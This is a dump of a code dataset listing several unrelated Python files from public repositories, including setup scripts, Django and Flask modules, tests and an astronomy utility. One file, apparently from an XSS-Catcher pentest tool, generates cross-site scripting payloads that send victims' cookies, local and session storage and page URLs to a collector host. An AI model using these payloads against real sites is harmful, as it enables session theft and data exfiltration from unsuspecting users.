max_stars_repo_path (stringlengths 3-269) | max_stars_repo_name (stringlengths 4-119) | max_stars_count (int64 0-191k) | id (stringlengths 1-7) | content (stringlengths 6-1.05M) | score (float64 0.23-5.13) | int_score (int64 0-5) |
---|---|---|---|---|---|---|
tests/setup.py | rdmolony/berpublicsearch | 0 | 12794251 | import os
try:
from setuptools import setup
except ImportError:
from distutils.core import setup
setup(
name="geopandas",
version=versioneer.get_version(),
description="Geographic pandas extensions",
license="BSD",
author="GeoPandas contributors",
author_email="<EMAIL>",
url="http://geopandas.org",
long_description=LONG_DESCRIPTION,
packages=[
"geopandas",
"geopandas.io",
"geopandas.tools",
"geopandas.datasets",
"geopandas.tests",
"geopandas.tools.tests",
],
package_data={"geopandas": data_files},
python_requires=">=3.6",
install_requires=INSTALL_REQUIRES,
cmdclass=versioneer.get_cmdclass(),
) | 1.398438 | 1 |
Misc/Join Function.py | Jigyanshu17/Python-Ka-Saara-Gyaan | 0 | 12794252 | <filename>Misc/Join Function.py
# list = ["John","Cena","Randy","Orton","Sheamus","Khali","<NAME>"]
# # for item in list:
# # print(item,"and",end=" ")
#
#
# a = " , ".join(list)
# print(a , " other are wwe superstars")
a = 123
def fun():
a = []
print(type(a)) | 3.53125 | 4 |
linuxmachinebeta/view/api/serializers.py | linux-machine/linuxmachinebeta | 0 | 12794253 | <filename>linuxmachinebeta/view/api/serializers.py
from django.utils.translation import gettext_lazy as _
from rest_framework import serializers
from linuxmachinebeta.view.models import ServiceView
from linuxmachinebeta.services.models import Service
class ServiceViewSerializer(serializers.ModelSerializer):
service = serializers.PrimaryKeyRelatedField(queryset=Service.objects.all())
class Meta:
model = ServiceView
fields = ['service']
def validate(self, attrs):
try:
ServiceView.objects.get(service=attrs['service'], user_ip=self.context['user_ip'])
except ServiceView.DoesNotExist:
return attrs
else:
raise serializers.ValidationError(_('You have already viewed this service.'))
| 2.328125 | 2 |
server/app/api/xss.py | vncloudsco/XSS-Catcher | 1 | 12794254 | <gh_stars>1-10
from flask import jsonify, request
from app import db
from app.models import Client, XSS
from app.api import bp
from flask_login import login_required, current_user
from app.decorators import permissions
import json
@bp.route('/xss/generate/<id>', methods=['GET'])
@login_required
def xss_generate(id):
"""Generates an XSS payload"""
client = Client.query.filter_by(id=id).first_or_404()
uid = client.uid
parameters = request.args.to_dict()
other_data = ''
xss_type = 'r'
require_js = False
require_params = False
cookies = False
local_storage = False
session_storage = False
get_url = False
i_want_it_all = False
code_type = 'html'
if 'url' not in parameters.keys():
return jsonify({'status': 'error', 'detail': 'Missing url parameter'}), 400
for param, value in parameters.items():
if param == 'url':
url = value
elif param == 'i_want_it_all':
i_want_it_all = True
elif param == 'stored':
xss_type = 's'
elif param == 'cookies':
cookies = True
require_js = True
require_params = True
elif param == 'local_storage':
local_storage = True
require_js = True
require_params = True
elif param == 'session_storage':
session_storage = True
require_js = True
require_params = True
elif param == 'code':
if value == 'html':
code_type = 'html'
elif value == 'js':
code_type = 'js'
require_js = True
else:
return jsonify({'status': 'error', 'detail': 'Unknown code type'}), 400
elif param == 'geturl':
get_url = True
require_js = True
require_params = True
else:
if other_data != '':
other_data += '&'
other_data += '{}={}'.format(param, value)
require_params = True
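# Recognised query parameters (summary of the loop above): url (required), stored,
# cookies, local_storage, session_storage, geturl, code=html|js and i_want_it_all;
# any other parameter is appended verbatim to other_data and sent along with the payload.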
if i_want_it_all:
if code_type == 'js':
payload = ';}};var js=document.createElement("script");js.src="{}/static/collector.min.js";js.onload=function(){{sendData("{}/api/x/{}/{}","{}")}};document.body.appendChild(js);'.format(
url, url, xss_type, uid, other_data)
return (payload), 200
else:
payload = """'>"><script src={}/static/collector.min.js></script><script>sendData("{}/api/x/{}/{}", "{}")</script>""".format(
url, url, xss_type, uid, other_data)
return (payload), 200
if code_type == 'js':
payload = ';};new Image().src="'
else:
payload = """'>">"""
if require_js:
payload += '<script>new Image().src="'
else:
payload += '<img src="'
payload += '{}/api/x/{}/{}'.format(url, xss_type, uid)
if require_params:
payload += '?'
if cookies:
payload += 'cookies="+encodeURIComponent(document.cookie)'
if local_storage:
if cookies:
payload += '+"&'
payload += 'local_storage="+encodeURIComponent(JSON.stringify(localStorage))'
if session_storage:
if cookies or local_storage:
payload += '+"&'
payload += 'session_storage="+encodeURIComponent(JSON.stringify(sessionStorage))'
if get_url:
if cookies or local_storage or session_storage:
payload += '+"&'
payload += 'origin_url="+encodeURIComponent(location.href)'
if other_data != '':
if cookies or local_storage or session_storage or get_url:
payload += '+"&'
payload += other_data
payload += '"'
if not require_params:
payload += '"'
if code_type == 'js':
payload += ';'
else:
if require_js:
payload += '</script>'
else:
payload += ' />'
return (payload), 200
@bp.route('/xss/<xss_id>', methods=['DELETE'])
@login_required
@permissions(one_of=['admin', 'owner'])
def xss_delete(xss_id):
"""Deletes an XSS"""
xss = XSS.query.filter_by(id=xss_id).first_or_404()
db.session.delete(xss)
db.session.commit()
return jsonify({'status': 'OK', 'detail': 'XSS deleted successfully'}), 200
@bp.route('/xss/<xss_id>/<loot_type>', methods=['GET'])
@login_required
def xss_loot_get(xss_id, loot_type):
"""Gets a specific type of data for an XSS"""
xss = XSS.query.filter_by(id=xss_id).first_or_404()
data = json.loads(xss.data)
return jsonify({'data': data[loot_type]}), 200
@bp.route('/xss/<xss_id>/<loot_type>', methods=['DELETE'])
@login_required
@permissions(one_of=['admin', 'owner'])
def xss_loot_delete(xss_id, loot_type):
"""Deletes a specific type of data for an XSS"""
xss = XSS.query.filter_by(id=xss_id).first_or_404()
data = json.loads(xss.data)
data.pop(loot_type, None)
xss.data = json.dumps(data)
db.session.commit()
return jsonify({'status': 'OK', 'detail': 'Data deleted successfully'}), 200
| 2.78125 | 3 |
tests/test_ccppasswordrestsecure.py | dvdangelo33/pyaim | 0 | 12794255 | #!/usr/bin/env python3
from pyaim import CCPPasswordRESTSecure
aimccp = CCPPasswordRESTSecure('https://cyberark.dvdangelo33.dev/', "clientcert.pem", verify=True)
r = aimccp.GetPassword(appid='pyAIM',safe='D-AWS-AccessKeys',username='AnsibleAWSUser')
print(r)
| 1.765625 | 2 |
clonigram/posts/apps.py | EdinsonRequena/platzi-django-course | 1 | 12794256 | '''
Post application module.
'''
from django.apps import AppConfig
class PostsConfig(AppConfig):
'''
:type name: str
:type verbose_name: str
'''
name = 'posts'
verbose_name = 'Posts'
| 1.710938 | 2 |
tests/opening_test.py | karlch/vimiv | 268 | 12794257 | <reponame>karlch/vimiv
# vim: ft=python fileencoding=utf-8 sw=4 et sts=4
"""Test the opening of different file-types with vimiv."""
import os
from unittest import main
from vimiv_testcase import VimivTestCase
class OpeningTest(VimivTestCase):
"""Open with different file-types Test."""
@classmethod
def setUpClass(cls):
cls.init_test(cls)
def test_opening_with_directory(self):
"""Opening with a directory."""
expected_dir = os.path.abspath("vimiv/testimages")
self.init_test(["vimiv/testimages"])
self.assertEqual(expected_dir, os.getcwd())
expected_files = ["animation", "arch-logo.png", "arch_001.jpg",
"directory", "symlink_to_image", "vimiv.bmp",
"vimiv.svg", "vimiv.tiff"]
self.assertEqual(self.vimiv["library"].files, expected_files)
self.assertTrue(self.vimiv["library"].is_focus())
self.assertTrue(self.vimiv["library"].grid.is_visible())
def test_opening_with_image(self):
"""Open with an image."""
expected_dir = os.path.abspath("vimiv/testimages")
self.init_test(["vimiv/testimages/arch_001.jpg"])
# Check moving and image population
self.assertEqual(expected_dir, os.getcwd())
expected_images = ["arch_001.jpg", "symlink_to_image", "vimiv.bmp",
"vimiv.svg", "vimiv.tiff", "arch-logo.png"]
for image in [os.path.abspath(im) for im in expected_images]:
self.assertIn(image, self.vimiv.get_paths())
def test_opening_with_symlink(self):
"""Open with a symlink to an image."""
expected_dir = os.path.abspath("vimiv/testimages")
self.init_test(["vimiv/testimages/symlink_to_image"])
# Check moving and image population
self.assertEqual(expected_dir, os.getcwd())
expected_images = ["symlink_to_image", "vimiv.bmp", "vimiv.svg",
"vimiv.tiff", "arch-logo.png", "arch_001.jpg"]
expected_images = [os.path.abspath(image) for image in expected_images]
for image in [os.path.abspath(im) for im in expected_images]:
self.assertIn(image, self.vimiv.get_paths())
def test_opening_with_whitespace(self):
"""Open an image with whitespace and symlink in directory."""
expected_dir = os.path.abspath("vimiv/testimages/directory/")
self.init_test(["vimiv/testimages/directory/symlink with spaces .jpg"])
# Check moving and image population
self.assertEqual(expected_dir, os.getcwd())
expected_images = ["symlink with spaces .jpg"]
expected_images = [os.path.abspath(image) for image in expected_images]
self.assertEqual(expected_images, self.vimiv.get_paths())
def test_opening_recursively(self):
"""Open all images recursively."""
# Need to backup because we init in the wrong directory here
working_dir = self.working_directory
os.chdir("vimiv/testimages")
self.init_test(["."], to_set=["recursive"], values=["true"])
self.assertEqual(8, len(self.vimiv.get_paths()))
self.settings.reset()
self.working_directory = working_dir
def tearDown(self):
self.vimiv.quit()
os.chdir(self.working_directory)
if __name__ == "__main__":
main()
| 2.546875 | 3 |
flexget/plugins/operate/disable_builtins.py | Crupuk/Flexget | 0 | 12794258 | from __future__ import unicode_literals, division, absolute_import
import logging
from flexget import plugin
from flexget.plugin import priority, register_plugin, plugins
log = logging.getLogger('builtins')
def all_builtins():
"""Helper function to return an iterator over all builtin plugins."""
return (plugin for plugin in plugins.itervalues() if plugin.builtin)
class PluginDisableBuiltins(object):
"""Disables all (or specific) builtin plugins from a task."""
def __init__(self):
# cannot trust that on_task_start would have been executed
self.disabled = []
# TODO: schemas are registered to a uri at plugin load, the list of builtins will not be complete at that time
schema = {
'oneOf': [
{'type': 'boolean'},
{'type': 'array', 'items': {'type': 'string', 'enum': [p.name for p in all_builtins()]}}
]
}
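# Illustrative task configuration matching the schema above ('seen' is just an
# example builtin plugin name, not taken from this module):
#   disable_builtins: yes          # disable every builtin plugin
#   disable_builtins: [seen]       # disable only the listed builtin plugins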
def debug(self):
log.debug('Builtin plugins: %s' % ', '.join(plugin.name for plugin in all_builtins()))
@priority(255)
def on_task_start(self, task, config):
self.disabled = []
if not config:
return
for plugin in all_builtins():
if config is True or plugin.name in config:
plugin.builtin = False
self.disabled.append(plugin.name)
log.debug('Disabled builtin plugin(s): %s' % ', '.join(self.disabled))
@priority(-255)
def on_task_exit(self, task, config):
if not self.disabled:
return
for name in self.disabled:
plugin.plugins[name].builtin = True
log.debug('Enabled builtin plugin(s): %s' % ', '.join(self.disabled))
self.disabled = []
on_task_abort = on_task_exit
register_plugin(PluginDisableBuiltins, 'disable_builtins', api_ver=2)
| 2.15625 | 2 |
warehouse/legacy/pypi.py | hickford/warehouse | 1 | 12794259 | <filename>warehouse/legacy/pypi.py
# Copyright 2013 <NAME>
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import json
import time
from werkzeug.utils import redirect
from werkzeug.exceptions import NotFound, BadRequest
from warehouse import fastly
from warehouse.helpers import url_for
from warehouse.http import Response
from warehouse.legacy import xmlrpc
from warehouse.templates import render_response
from warehouse.utils import cache, cors, is_valid_json_callback_name
_action_methods = {}
def register(name):
"""Register a handler for a legacy :action style dispatch.
Most of the dispatch in legacy PyPI was implemented using a :action
parameter in the GET or POST arguments.
This doesn't actually decorate the function or alter it in any way, it
simply registers it with the legacy routing mapping.
"""
if name in _action_methods:
raise KeyError('Attempt to re-register name %r' % (name, ))
def deco(fn):
_action_methods[name] = fn
return fn
return deco
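# Illustrative use of the decorator above (the handler name is hypothetical):
#
#   @register('display')
#   def display(app, request):
#       ...
#
# pypi() below would then dispatch requests carrying ?:action=display to it.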
def pypi(app, request):
# check for the legacy :action-style dispatch
action = request.args.get(':action')
if action in _action_methods:
return _action_methods[action](app, request)
# No :action means we render the index, or at least we redirect to where it
# moved to
return redirect(
url_for(
request,
"warehouse.views.index",
),
code=301,
)
def daytime(app, request):
response = time.strftime("%Y%m%dT%H:%M:%S\n", time.gmtime(time.time()))
return Response(response, mimetype="text/plain")
@cors
@cache(browser=1, varnish=120)
@fastly.projects(project_name="project")
def project_json(app, request, project_name, version=None):
# fail early if callback is invalid
callback = request.args.get('callback')
if callback:
if not is_valid_json_callback_name(callback):
raise BadRequest('invalid JSONP callback name')
# Get the real project name for this project
project = app.db.packaging.get_project(project_name)
if project is None:
raise NotFound("{} does not exist".format(project_name))
# we're looking for the latest version
versions = app.db.packaging.get_project_versions(project['name'])
if version is None:
if not versions:
raise NotFound("{} has no releases".format(project_name))
version = versions[0]
elif version not in versions:
raise NotFound("{} has no release {}".format(project_name, version))
rpc = xmlrpc.Interface(app, request)
d = dict(
info=rpc.release_data(project['name'], version),
urls=rpc.release_urls(project['name'], version),
releases=rpc.all_release_urls(project['name']),
)
time_format = '%Y-%m-%dT%H:%M:%S'
for url in d['urls']:
url['upload_time'] = url['upload_time'].strftime(time_format)
for release, urls in d['releases'].items():
for url in urls:
url['upload_time'] = url['upload_time'].strftime(time_format)
data = json.dumps(d, sort_keys=True)
# write the JSONP extra crap if necessary
if callback:
data = '/**/ %s(%s);' % (callback, data)
serial = app.db.packaging.get_last_serial()
response = Response(data, mimetype="application/json")
response.headers['Content-Disposition'] = 'inline'
response.headers.add("X-PyPI-Last-Serial", serial)
return response
@register('rss')
@cache(browser=1, varnish=120)
@fastly.rss
def rss(app, request):
"""Dump the last N days' updates as an RSS feed.
"""
releases = app.db.packaging.get_recently_updated(num=40)
for release in releases:
# TODO update _force_external to _external when Flask-ification is done
url = url_for(request, 'warehouse.packaging.views.project_detail',
project_name=release['name'], version=release['version'],
_force_external=True)
release.update(dict(url=url))
response = render_response(
app, request, "legacy/rss.xml",
description='package updates',
releases=releases,
site=app.config.site,
)
response.mimetype = 'text/xml; charset=utf-8'
# TODO: throw in a last-modified header too?
return response
@register('packages_rss')
@cache(browser=1, varnish=120)
@fastly.rss
def packages_rss(app, request):
"""Dump the last N days' new projects as an RSS feed.
"""
releases = app.db.packaging.get_recent_projects(num=40)
for release in releases:
# TODO update _force_external to _external when Flask-ification is done
url = url_for(request, 'warehouse.packaging.views.project_detail',
project_name=release['name'], _force_external=True)
release.update(dict(url=url))
response = render_response(
app, request, "legacy/rss.xml",
description='new projects',
releases=releases,
site=app.config.site,
)
response.mimetype = 'text/xml; charset=utf-8'
# TODO: throw in a last-modified header too?
return response
| 2.21875 | 2 |
CCF/CSP/2013/13123.py | cnsteven/online-judge | 1 | 12794260 | <reponame>cnsteven/online-judge
n = int(input())
h = list(map(int, input().split()))
ans = 0
for i in range(n):
min_height = h[i]
for j in range(i, n):
min_height = min(min_height, h[j])
ans = max(ans, (j - i + 1) * min_height)
print(ans)
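# Worked example: for n = 5 and h = [2, 1, 4, 5, 1] the widest rectangle uses
# h[2] and h[3] (min height 4, width 2), so the program prints 8.
# The nested loops try every span (i, j), giving O(n^2) time in total.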
| 3.015625 | 3 |
2018/07/debug_me/1_2.py | lfrommelt/monty | 0 | 12794261 | # drink price list
prices = {'coke': 2, 'beer': 2.5, 'water': 0, 'juice': 2}
print(prices['beer'])
| 2.828125 | 3 |
tests/test_helpers.py | nvn-nil/bigo_test | 0 | 12794262 | <reponame>nvn-nil/bigo_test
# -*- coding: utf-8 -*-
import unittest
from time import sleep
import numpy as np
from bigo_test.assertions.helpers import execution_timer
def test_func_factory(n):
def func(a):
# pylint: disable=unused-argument
sleep(n)
return func
class TestHelpers(unittest.TestCase):
def test_execution_timer(self):
func = test_func_factory(1)
numbers, times = execution_timer(func, lambda x: x, options={"minimum_n": 1, "maximum_n": 1, "n_count": 2})
np.testing.assert_array_equal(numbers, np.array([1, 1]))
np.testing.assert_almost_equal(times, np.array([1, 1]), decimal=1)
def test_execution_timer_defaults(self):
func = test_func_factory(1)
numbers, times = execution_timer(func)
np.testing.assert_array_equal(numbers, np.array([1, 1]))
np.testing.assert_almost_equal(times, np.array([1, 1]), decimal=1)
def test_execution_timer_maximum_n_lesser_than_minimum_n(self):
func = test_func_factory(1)
numbers, times = execution_timer(func, options={"minimum_n": 2, "maximum_n": 1})
np.testing.assert_array_equal(numbers, np.array([2, 2]))
np.testing.assert_almost_equal(times, np.array([1, 1]), decimal=1)
if __name__ == "__main__":
unittest.main()
| 2.40625 | 2 |
colorcode/convert.py | nonylene/lostfound | 0 | 12794263 | <gh_stars>0
from config import COLORS
def to_color(code, color):
r,g,b = (int(code[i*2+1:i*2+3],16) for i in range(3))
return (color, {'r': r, 'g': g, 'b': b})
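# Example, assuming COLORS holds ('#rrggbb', name) pairs such as ('#ff8000', 'orange'):
# to_color('#ff8000', 'orange') == ('orange', {'r': 255, 'g': 128, 'b': 0})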
d = dict(to_color(code,color) for code, color in COLORS)
import json
print(json.dumps(d,ensure_ascii=False))
| 3.203125 | 3 |
spotify_wordcloud/config.py | HelloRusk/spotify-wordcloud | 9 | 12794264 | from dotenv import load_dotenv
from os import environ, path
from pathlib import Path
load_dotenv(verbose=True)
parent_path = Path(__file__).parent
dotenv_path = path.join(parent_path, ".env")
load_dotenv(dotenv_path)
CSRF_COOKIE_SECURE = True
CSRF_COOKIE_HTTPONLY = True
SECRET_KEY = environ.get("SECRET_KEY")
SPOTIFY_OAUTH_CLIENT_ID = environ.get("SPOTIFY_OAUTH_CLIENT_ID")
SPOTIFY_OAUTH_CLIENT_SECRET = environ.get("SPOTIFY_OAUTH_CLIENT_SECRET")
CLOUD_STORAGE_BUCKET = environ.get("CLOUD_STORAGE_BUCKET")
FLASK_DEBUG = environ.get("FLASK_DEBUG")
TESTING = environ.get("TESTING")
if FLASK_DEBUG or TESTING:
CALLBACK_URL = environ.get("CALLBACK_URL_DEV")
SQLALCHEMY_DATABASE_URI = environ.get("DATABASE_URL_DEV")
else:
CALLBACK_URL = environ.get("CALLBACK_URL")
SQLALCHEMY_DATABASE_URI = environ.get("DATABASE_URL")
SQLALCHEMY_TRACK_MODIFICATIONS = True
| 2.046875 | 2 |
config.py | Anonymous78/Registration-System | 0 | 12794265 | <reponame>Anonymous78/Registration-System<filename>config.py
# config.py
"""
Module containing the configurations for different environments
"""
class Config(object):
"""Common configurations"""
# Put any configurations common across all environments
SESSION_COOKIE_NAME = "session"
TESTING = False
class DevelopmentConfig(Config):
"""Development configurations"""
DEBUG = True # activates debug mode on app
SQLALCHEMY_ECHO = True # allows SQLAlchemy to log errors
SQLALCHEMY_TRACK_MODIFICATIONS = True # allows SQLAlchemy to track changes while running
class ProductionConfig(Config):
"""Production configurations"""
DEBUG = False
SQLALCHEMY_TRACK_MODIFICATIONS = False
app_config = {
'development': 'DevelopmentConfig',
'production': 'ProductionConfig'
}
| 2.5 | 2 |
stations/tests/test_validation.py | sharksmhi/stations | 0 | 12794266 | <gh_stars>0
# Copyright (c) 2020 SMHI, Swedish Meteorological and Hydrological Institute
# License: MIT License (see LICENSE.txt or http://opensource.org/licenses/mit).
"""
Created on 2020-10-01 16:37
@author: a002028
"""
from stations.main import App
if __name__ == '__main__':
app = App()
app.read_list(
'C:/Arbetsmapp/config/station.txt',
reader='shark_master',
list_name='master'
)
# fid = 'C:\\station_exports\\validerade\\Stationsregistret_validering_gävle_validerad.xlsx'
# fid = 'C:\\station_exports\\nkp\\Stationsregistret_validering.xlsx'
fid = 'C:\\station_exports\\natvat\\StnReg03_Inmatningsmall.xlsx'
app.read_list(
fid,
reader='stnreg',
list_name='stnreg_import'
)
app.validate_list('stnreg_import') #, 'master')
# from stations.validators.validator import ValidatorLog
# app.write_list(
# writer='validation_log',
# data=ValidatorLog.log
# )
#
# app.write_list(
# writer='shark_master',
# list_names=['master', 'stnreg_import'],
# )
app.write_list(
writer='stnreg',
list_names='stnreg_import',
)
# file_path = 'C:/Arbetsmapp/config/sharkweb_shapefiles/Havsomr_SVAR_2016_3c_CP1252.shp'
# validator = PositionValidator(file_path=file_path)
# print('shapes read')
#
# report = validator.validate(app.lists['master'])
| 1.882813 | 2 |
SIS/forms.py | toHarsh/Management-System | 2 | 12794267 | from flask_wtf import FlaskForm
from wtforms import StringField, SubmitField, PasswordField
from wtforms.validators import Email,DataRequired,Length, ValidationError
from SIS.models import Info
import email_validator
class sisForm(FlaskForm):
rollNo = StringField('Roll No',
validators=[DataRequired()])
prn = StringField('Roll No',
validators=[DataRequired(),Length(min=9,max=10)])
name = StringField('Name',
validators=[DataRequired(),Length(min=2,max=40)])
mobNo = StringField('Mobile No',
validators=[DataRequired(),Length(min=9,max=10)])
email = StringField('Email',
validators=[DataRequired(), Email()])
city = StringField('Name',
validators=[DataRequired(),Length(min=2,max=40)])
state = StringField('Name',
validators=[DataRequired(),Length(min=2,max=40)])
submit = SubmitField('Submit')
def validate_rollNo(self,rollNo):
info = Info.query.filter_by(rollNo=rollNo.data).first()
if info:
raise ValidationError('This Roll No is already there in the database.')
def validate_prn(self,prn):
info = Info.query.filter_by(prn=prn.data).first()
if info:
raise ValidationError('This PRN is already there in the database.')
def validate_mobNo(self,mobNo):
info = Info.query.filter_by(mobNo=mobNo.data).first()
if info:
raise ValidationError('This Mobile Number is already there in the database.')
def validate_email(self,email):
info = Info.query.filter_by(email=email.data).first()
if info:
raise ValidationError('This Email is already there in the database.')
class adminForm(FlaskForm):
email = StringField('Email',
validators=[DataRequired(), Email()])
password = PasswordField('Password',
validators=[DataRequired(),Length(min=2,max=10)])
submit = SubmitField('Submit') | 2.78125 | 3 |
SVM/Cancer_prediction.py | AlexKH22/Machine_Learning | 0 | 12794268 | <filename>SVM/Cancer_prediction.py
import numpy as np
from sklearn import svm
from sklearn.model_selection import train_test_split  # replaces the removed sklearn.cross_validation module
import pandas as pd
df = pd.read_csv('breast-cancer-wisconsin.data.txt')
df.replace('?',-99999, inplace=True)
df.drop(['id'], 1, inplace=True)
X = np.array(df.drop(['class'], 1))
y = np.array(df['class'])
X_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.2)
clf = svm.SVC()
clf.fit(X_train, y_train)
confidence = clf.score(X_test, y_test)
print(confidence)
example_measures = np.array([[4, 2, 1, 1, 1, 2, 3, 2, 1]])
example_measures = example_measures.reshape(len(example_measures), -1)
prediction = clf.predict(example_measures)
print(prediction)
| 3.078125 | 3 |
tests/viewmixins/forms.py | samuelmaudo/yepes | 0 | 12794269 | # -*- coding:utf-8 -*-
from __future__ import unicode_literals
from django import forms
class JsonMixinForm(forms.Form):
boolean = forms.BooleanField()
char = forms.CharField(
min_length=3,
max_length=6)
integer = forms.IntegerField(
min_value=3,
max_value=6)
| 2.109375 | 2 |
contrail_api_cli/commands/rm.py | mrasskazov/contrail-api-cli | 0 | 12794270 | <reponame>mrasskazov/contrail-api-cli<gh_stars>0
# -*- coding: utf-8 -*-
import itertools
from ..command import Command, Arg, Option, experimental, expand_paths
from ..resource import Resource
from ..utils import continue_prompt
@experimental
class Rm(Command):
"""Delete a resource from the API.
.. warning::
`-r` option can be used to delete recursively back_refs of
the resource.
"""
description = "Delete a resource"
paths = Arg(nargs="*", help="Resource path(s)",
metavar='path', complete="resources::path")
recursive = Option("-r", action="store_true",
default=False,
help="Recursive delete of back_refs and children resources")
force = Option("-f", action="store_true",
default=False,
help="Don't ask for confirmation")
def _get_back_refs(self, resources, back_refs):
for resource in resources:
resource.fetch()
if resource in back_refs:
back_refs.remove(resource)
back_refs.append(resource)
for back_ref in itertools.chain(resource.back_refs, resource.children):
back_refs = self._get_back_refs([back_ref], back_refs)
return back_refs
def __call__(self, paths=None, recursive=False, force=False):
resources = expand_paths(paths,
predicate=lambda r: isinstance(r, Resource))
if recursive:
resources = self._get_back_refs(resources, [])
if resources:
message = """About to delete:
- %s""" % "\n - ".join([self.current_path(r) for r in resources])
if force or continue_prompt(message=message):
for r in reversed(resources):
print(("Deleting %s" % self.current_path(r)))
r.delete()
| 2.390625 | 2 |
r_pass/urls.py | abztrakt/r-pass | 0 | 12794271 | from django.conf.urls import patterns, include, url
urlpatterns = patterns('',
# Examples:
url(r'^service/.*/(?P<service_id>[0-9]+)/edit/?$', 'r_pass.views.edit'),
url(r'^service/.*/(?P<service_id>[0-9]+)/?$', 'r_pass.views.service'),
url(r'^create/?$', 'r_pass.views.create'),
url(r'', 'r_pass.views.home'),
)
| 1.898438 | 2 |
stack-trace-solver-be/src/exception_extractor.py | TeamInterject/stack-trace-solver | 0 | 12794272 | from regex_matchers import retrieve_exceptions
from utils import chunks
import threading
import glob
from pathlib import Path
import os
def extract_exceptions(files):
for path in files:
fileName = Path(path).stem
outputFile = f"ignored_data/exceptions/{fileName}.txt"
if os.path.isfile(outputFile):
continue
with open(path, "r+", encoding="utf-8", errors='ignore') as file:
lines = "\n".join(file.readlines())
excs = retrieve_exceptions(lines)
if len(excs) == 0:
continue
print(path)
with open(f"ignored_data/exceptions/{fileName}.txt", "a", encoding="utf-8", errors="ignore") as output:
for exception in excs:
output.write(exception.__str__() + "\n")
def orchestrate_extraction(threads=8):
files = glob.glob("ignored_data/downloads/*.xml")
files.sort()
chunked_files = chunks(files, threads)
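# chunks() from utils is assumed to split the sorted file list into groups;
# one worker thread is started per group in the loop below.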
threads = []
for chunk in chunked_files:
t = threading.Thread(target=extract_exceptions, args=(chunk,))
threads.append(t)
t.start()
for t in threads:
t.join()
files = glob.glob("ignored_data/exceptions/*.txt")
for path in files:
with open(f"ignored_data/exceptions.txt", "a", encoding="utf-8", errors="ignore") as output:
with open(path, "r+", encoding="utf-8", errors='ignore') as file:
lines = "\n".join(file.readlines())
output.write(lines)
def load_exceptions(filename):
with open(f"ignored_data/{filename}", "r+", encoding="utf-8", errors='ignore') as file:
lines = "\n".join(file.readlines())
return retrieve_exceptions(lines)
def retrieve_exception_dictionary(filename):
exceptions = load_exceptions(filename)
ex_dict = {}
for exception in exceptions:
if exception.exception not in ex_dict:
ex_dict[exception.exception] = []
ex_dict[exception.exception].append(exception)
return ex_dict
def debug_print(filename):
ex_dict = retrieve_exception_dictionary(filename)
ex_dict_keys = list(ex_dict.keys())
ex_dict_keys.sort()
for key in ex_dict_keys:
values = ex_dict[key]
if len(values) < 2:
continue
print(key)
for value in values:
print(f"\t{value}")
# debug_print("exceptions_minimized.txt") | 2.796875 | 3 |
PreFRBLE/PreFRBLE/convenience.py | FRBs/PreFRBLE | 5 | 12794273 | from __future__ import print_function
import sys, h5py as h5, numpy as np, yt, csv
from time import time, sleep
from PreFRBLE.file_system import *
from PreFRBLE.parameter import *
from time import time
def TimeElapsed( func, *args, **kwargs ):
""" measure time taken to compute function """
def MeasureTime():
t0 = time()
res = func( *args, **kwargs)
print( "{} took {} s".format( func.__name__, time()-t0 ) )
return res
return MeasureTime()
from time import sleep
## wrapper to write hdf5 files consistently
def Write2h5( filename='', datas=[], keys=[] ):
""" conveniently write datas to keys in filename. overwrite existing entries """
if type(keys) is str:
sys.exit( 'Write2h5 needs list of datas and keys' )
### small workaround to allow for parallel computation. Use with caution, might corrupt nodes in your h5 file. in that case, visit:
### https://stackoverflow.com/questions/47979751/recover-data-from-corrupted-file/61147632?noredirect=1#comment108190378_61147632
tries = 0
while tries < 30:
#try:
with h5.File( filename, 'a' ) as f:
for data, key in zip( datas, keys ):
try:
f[key][()]
f.__delitem__( key )
except:
pass
f.create_dataset( key, data=data )
break
#except:
sleep(3e-2)
tries += 1
pass
else:
print( "couldn't write ", keys )
sys.exit(1)
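# Illustrative call (file and key names are made up):
# Write2h5( filename='likelihoods.h5', datas=[np.arange(10), 3.14], keys=['grid/x', 'grid/norm'] )
# writes both objects and silently overwrites keys that already exist.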
## Read FRBcat
#FRB_dtype = [('ID','S'),('DM','f'),('DM_gal','f'), ('RM','f'),('tau','f'),('host_redshift','S'), ('tele','S')]
#FRB_dtype = [('ID','U9'),('DM','f'),('DM_gal','f'), ('RM','U10'),('tau','U10'),('host_redshift','U4'), ('tele','U10')]
FRB_dtype = [('ID','U9'),('DM','f'),('DM_gal','f'), ('RM','f'),('tau','f'),('host_redshift','f'), ('tele','U10')]
def GetFRBcat( telescopes=None, RM=None, tau=None, print_number=False ):
"""
read all FRBs in FRBcat, downloaded to frbcat_file
Parameters
----------
telescopes : list
list of considered telescopes, FRBs of other telescopes are ignored
RM : boolean
if True, only return FRBs observed with RM
tau : boolean
if True, only return FRBs observed with temporal broadening
print_number : boolean
if True, print number of extracted FRBs
Returns
-------
FRBs : array
structured numpy.array containing values listed in FRBcat
"""
### read all FRBs from FRBcat
### optional: read only those FRBs observed by telescope with RM and tau
### print_number:True print number of extracted FRBs
FRBs = []
with open( frbcat_file, 'r') as f:
reader = csv.reader( f )
header = np.array(next(reader))
# header = np.array(reader.next())
i_ID = 0
i_DM = np.where( header == 'rmp_dm' )[0][0]
i_DM_gal = np.where( header == 'rop_mw_dm_limit' )[0][0]
i_RM = np.where( header == 'rmp_rm' )[0][0]
i_tau = np.where( header == 'rmp_scattering' )[0][0]
i_zs = np.where( header == 'rmp_redshift_host' )[0][0]
i_tele = np.where( header == 'telescope' )[0][0]
i_s = [i_ID, i_DM, i_DM_gal, i_RM, i_tau, i_zs, i_tele] ## order must fit order of FRB_dtype
for row in reader:
if telescopes and ( row[i_tele] not in [telescopes_FRBcat[tele] for tele in telescopes] ) :
continue
if tau and ( row[i_tau] == 'null' ) :
continue
if RM and ( row[i_RM] == 'null' ) :
continue
FRBs.append( tuple( [ decode(row[i].split('&')[0], dtype) for i, dtype in zip( i_s, np.array(FRB_dtype)[:,1] ) ] ) )
return np.array( FRBs, dtype=FRB_dtype )
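## Illustrative call ('parkes' stands for any key of telescopes_FRBcat):
## GetFRBcat( telescopes=['parkes'], RM=True ) returns the structured array of
## FRBs observed by that telescope that also have a measured rotation measure.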
def decode( string, dtype='U' ):
